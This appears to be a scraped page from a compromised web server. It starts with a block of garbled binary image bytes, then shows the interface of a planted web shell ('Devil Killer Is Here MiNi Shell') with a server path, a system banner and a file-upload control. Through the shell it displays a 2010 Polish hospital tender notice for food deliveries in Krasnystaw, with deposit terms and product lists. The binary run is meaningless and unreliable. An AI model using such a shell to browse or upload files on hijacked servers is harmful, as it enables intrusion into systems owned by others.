JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100615/153517-N-2010.html

<p class="kh_header"><b>Krasnystaw: PN 10/2010 Dostawa artykułów spożywczych do Kuchni Szpitalnej SP ZOZ w Krasnystawie</b><br>
<b>Numer ogłoszenia: 153517 - 2010; data zamieszczenia: 15.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie , ul. M. Sobieskiego 4B, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5762170, faks 082 5764901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozkrasnystaw.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samodzielny Publiczny Zespół Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN 10/2010 Dostawa artykułów spożywczych do Kuchni Szpitalnej SP ZOZ w Krasnystawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup artykułów spożywczych podzielony na 4 pakiety (zadania) wraz z dostawą do Kuchni Szpitalnej SP ZOZ w Krasnymstawie:
1.	Mięso i wędliny 
2.     Nabiał 
3.	Przyprawy, sosy, koncentraty i zupy 
4.	Pieczywo 
2.	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ. Podane ilości są szacunkowym zapotrzebowaniem na okres 12 miesięcy. Zamawiający zastrzega sobie prawo do rezygnacji z zakupu części asortymentu wynikającego z braku zapotrzebowania, jednakże zmniejszenie nie będzie przekraczało 20 % wartości umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-3, 15.81.10.00-6, 15.13.11.30-5, 15.50.00.00-3, 15.87.00.00-7, 15.87.12.60-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium. Wadium dla całego zamówienia wynosi: 8 200,00 zł (słownie: osiem tysięcy dwieście złotych), w tym dla poszczególnych części:
Zadanie 1	3 000,00 zł
Zadanie 2	3 000,00 zł
Zadanie 3	1 200,00 zł
Zadanie 4	1 000,00 zł
W przypadku złożenia oferty częściowej wykonawca zobowiązany jest wnieść wadium w kwocie określonej dla danej części (pakietu). W przypadku złożenia oferty na kilka części kwota wadium stanowi sumę wadiów ustalonych dla poszczególnych części zamówienia. Jeżeli wysokość wniesionego wadium będzie niższa niż suma wynikająca z poszczególnych części zamówienia, zamawiający uzna, że wadium nie zostało wniesione w wymaganej wysokości.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1	 pieniądzu,
2.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.3	gwarancjach bankowych,
2.4	gwarancjach ubezpieczeniowych, 
2.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Kredyt Bank S.A Oddz. Chełm, Nr rachunku 98 1500 1373 1213 7001 1365 0000 z dopiskiem: Wadium PN 10 2010 Artykuły spożywcze 
4. Wykonawca powinien złożyć w ofercie dowód wniesienia wadium w przypadku wpłaty przelewem. Terminem wniesienia wadium jest data i czas uznania rachunku Zamawiającego.
5. W przypadku wniesienia wadium w formach innych niż pieniądzu wykonawca zobowiązany jest dołączyć do oferty gwarancję bądź poręczenie w następujący sposób: kserokopię potwierdzoną za zgodność z oryginałem zszyć, zbindować lub w inny sposób trwale złączyć z ofertą, natomiast oryginał dokumentu należy złożyć wraz z ofertą w taki sposób aby była możliwość jego zwrócenia bez dekompletowania oferty. W przypadku, gdy oryginał dokumentu będzie zszyty, zbindowany lub w inny sposób trwale złączony z ofertą zamawiający nie dokona jego zwrotu. 
6. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
6.1	być wystawione na Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw,
6.2	zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 5 ustawy,
6.3	w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych w art. 46 ust. 5 ustawy każdego z tych wykonawców,
6.4	okres ważności wadium nie może być krótszy niż okres związania ofertą, przy czym pierwszym dniem ważności zobowiązania jest dzień składania ofert.
7. Zamawiający zwróci wadium na zasadach określonych w art. 46 ustawy. W przypadku wniesienia wadium w pieniądzu, w ofercie należy podać nazwę, adres banku oraz numer konta, na jakie zamawiający dokonuje zwrotu wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Prawo do ubiegania się o udzielenie zamówienia mają ci Wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b)	posiadają wiedzę i doświadczenie;
c)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d)	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
e)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy.
Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia na podstawie złożonych oświadczeń oraz dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 oraz spełnia warunki zawarte w art. 22 ust. 1 ustawy Pzp na formularzu oświadczenia stanowiącym załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Formularz OFERTA - załącznik nr 1.
2. Wypełniony formularz kosztorysu cenowego - załącznik nr 2.
3. Zaakceptowany projekt umowy - załącznik nr 4.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Aktualne zaświadczenia, atesty, decyzje dopuszczające towar do obrotu handlowego.
4. Decyzja Państwowego Inspektoratu Sanitarnego dopuszczająca środki transportu wykonawcy do przewozu towaru.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dokument potwierdzający wniesienie wadium. W przypadku wniesienia wadium w formie gwarancji, do oferty należy dołączyć poświadczaną za zgodność z oryginałem kserokopię a oryginał dostarczyć w osobnej  kopercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania wykonawcy nie wynika z innych dokumentów załączonych przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozkrasnystaw.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw w Dziale Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 09:30, miejsce: Kancelaria Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1. Mięso i wędliny 
Wadium 3 000,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 	 J.m. 	 Ilość 
1.	Antrykot wołowy częściowo odkostniony	kg.	800
2.	Wołowina b k udziec	kg.	800
3.	Wołowina II klasa	kg.	300
4.	Schab z k	kg.	800
5.	Karkówka wieprz. b k	kg.	250
6.	Mięso wieprzowe kl 2	kg.	150
7.	Łopatka wieprzowa bez kości	kg.	250
8.	Kości wieprzowe schabowo karkowe	kg.	300
9.	Kark wołowy	kg.	1000
10.	Słonina wieprzowa płaty 	kg.	1000
11.	Łopatka cielęca b k	kg	80
12.	Wątroba cielęca	kg	60
13.	Szponder wołowy	kg	150
14.	Wątroba wieprzowa 	kg.	300
15.	Nogi wieprzowe	kg.	60
16.	Ozory wieprzowe	kg.	1100
17.	Flaki wołowe suche krojone	kg.	550
18.	Filet z indyka	kg.	900
19.	Filet z kurcząt świeży	kg.	300
20.	Kurczaki kl. A świeże	kg.	2300
21.	Porcja kulinarna z kurcząt	kg.	800
22.	Baleron gotowany	kg.	60
23.	Boczek b ż wędzony parzony	kg.	200
24.	Szynka gotowana	kg.	350
25.	Wędzonka boczkowa	kg.	50
26.	Szynka wieprzowa w osłonce	kg.	150
27.	Ogonówka wieprzowa	kg.	150
28.	Kiełbasa żywiecka	kg.	150
29.	Kiełbasa krakowska	kg.	450
30.	Polędwica z indyka	kg.	200
31.	Kiełbasa biała parzona wieprzowa	kg.	70
32.	Kiełbasa toruńska wieprzowa	kg.	400
33.	Schab pieczony	kg.	100
34.	Kiełbasa zwyczajna wieprzowa	kg.	250
35.	Szynka mielona	 kg.	150 
36.	Mielonka drobiowa	kg.	50
37.	Luncheon tradycyjny wieprzowy	kg.	120
38.	Szynka tyrolska wieprzowa	kg.	100
39.	Baleron drobiowy	kg.	150
40.	Kaszanka	kg.	350
41.	Kiszka pasztetowa wieprzowa z manną	kg.	150
42.	Salceson włoski	kg.	200
43.	Kiełbasa parówkowa	kg.	350
44.	Mortadela wieprzowa	kg.	800
45.	Parówki delikatesowe wieprzowe	kg.	350
46.	Pieczeń wiedeńska wieprzowa z papryką	kg.	250
47.	Serdelki drobiowe	kg.	200
48.	Konserwa turystyczna wieprzowa a  300 g.	szt.	800
49.	Luncheon śniadaniowy wieprzowy 300 g.	szt.	150
50.	Pieczeń rzymska	kg	50
51.	Pasztet mazowiecki wieprzowy 450 g słoik	szt.	1100
52.	Smalec paczkowany	kg	600
53.	Kiszka pasztetowa drobiowa	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2. Nabiał
Wadium 3 000,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 
Zawartość tłuszczu, opakowanie	 J.m. 	 Ilość 
1.	Mleko 2 % a 0,9 l lub 1 l lub 5 l	l	56 000
2.	Masło 82 % a 200 g	kg.	2 100
3.	Śmietana 18 % a 330 lub a 400 ml lub 500 ml	l	1 500
4.	Śmietana 12 % a 400 ml lub 330 ml	l	800
5.	Ser twardy 40 % tłuszczu	kg.	420
6.	Ser topiony a 100g	kg.	70
7.	Serek homogenizowany 9 % a 125 g, 150g	kg.	100
8.	Twaróg 15 % a 250 g (półtłusty)	kg.	2 200
9.	Jogurt 2,5 % a 150 g, 125 g	kg.	800
10.	Maślanka naturalna a 1 lub 0,4 l litr	l	3 900
11.	Serek wiejski 0,20 dkg	kg.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.Przyprawy, sosy koncentraty i zupy
Wadium 1 200,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 	 J.m. 	 Ilość 
1.	Koncentrat pomidorowy a 200 g	kg	500
2.	Chrzan tarty a 280 g	kg	125
3.	Groszek konserwowy a 400 g	kg	100
4.	Kukurydza konserwowa a 400 g	kg	60
5.	Ogórki konserwowe a 0.9 kg	kg	400
6.	Papryka konserwowa a 0.7 kg	kg	120
7.	Syrop a 0.5 l	l	120
8.	Budyń a 40 g	kg	22
9.	Cukier kryształ a 10 kg	kg	5 000
10.	Cukier waniliowy a 0.016 kg	kg	7
11.	Cynamon a 0.02 kg	kg	0.5
12.	Czosnek suszony a 0.02 kg	kg	2.50
13.	Galaretka owocowa a 0.10 kg	kg	47
14.	Herbata granulowana a 0.10kg	kg	110
15.	Herbata liściasta a 0.10 kg	kg	100
16.	Kakao a 0.10 kg	kg	33
17.	Kawa inka a 0.15 kg	kg	230
18.	Kisiel a 0.06 kg	kg	27
19.	Kwasek cytrynowy a 0.02 kg	kg	70
20.	Liście laurowe a 0.015 kg	kg	1.60
21.	Majeranek a 0.02 kg	kg	2.80
22.	Musztarda a 0.9 kg	kg	137
23.	Ocet a 0.5 l	l	75
24.	Olej uniwersalny a 5 l	l	320
25.	Pieprz naturalny a 0.02 kg	kg	10
26.	Pieprz ziołowy a 0.02 kg	kg	14
27.	Proszek do pieczenia a 0.02 kg	kg	0.60
28.	Przyprawa do drobiu a 1 kg	kg	13
29.	Przyprawa w płynie do zup a 1 l	l	170
30.	Sól a 25 kg	kg	1 900
31.	Ziele angielskie a 0.02 kg	kg	5.50
32.	Żelatyna spożywcza a.0.05 kg	kg	3.50
33.	Papryka mielona a 0.02 kg	kg	1
34.	Przyprawa do ryb a 0.06 kg	kg	3.50
35.	Przyprawa vegeta a 0.20 kg	kg	70
36.	Sos pieczeniowy a 2 kg	kg	4
37.	Rosół drobiowy a 0.12 kg	kg	30
38.	Zupa ogonowa a 0.06 kg	kg	25
39.	Zupa pieczarkowa a 0.06 kg	kg	20
40.	Zupa barszcz biały a 3 kg	kg	30
41.	Sos biały a 2 kg	kg	20
42.	Zupa grzybowa a 0.04 kg	kg	22
43.	Napój w proszku a 1 kg	kg	160
44.	Pieczywo wasa a 0.125 kg	kg	17
45.	Kasza gryczana a 1kg	kg	380
46.	Kasza jęczmienna a 1kg	kg	330
47.	Kasza manna a 1 kg	kg	600
48.	Mąka pszenna TYP 450 a 10 kg	kg	500
49.	Mąka pszenna TYP 500 a 10 kg	kg	1 500
50.	Mąka ziemniaczana a 1 kg	kg	240
51.	Płatki nestle neustik a 0.5 kg	kg	40
52.	Płatki kukurydziane a 5 kg	kg	500
53.	Płatki jęczmienne a 0.5 kg	kg	450
54.	Płatki owsiane a 0.5 kg	kg	520
55.	Płatki ryżowe a 0.2 kg	kg	410
56.	Ryż a 1 kg	kg	1 600
57.	Biszkopty a 350 g	kg	35
58.	Herbatniki a 2.5 kg	kg	170
59.	Suchary a 300 g	kg	60
60.	Przyprawa do mięsa a 0.05 kg	kg	9
61.	Makaron a 10 kg	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4. Pieczywo
Wadium 1 000,00 PLN.</p>
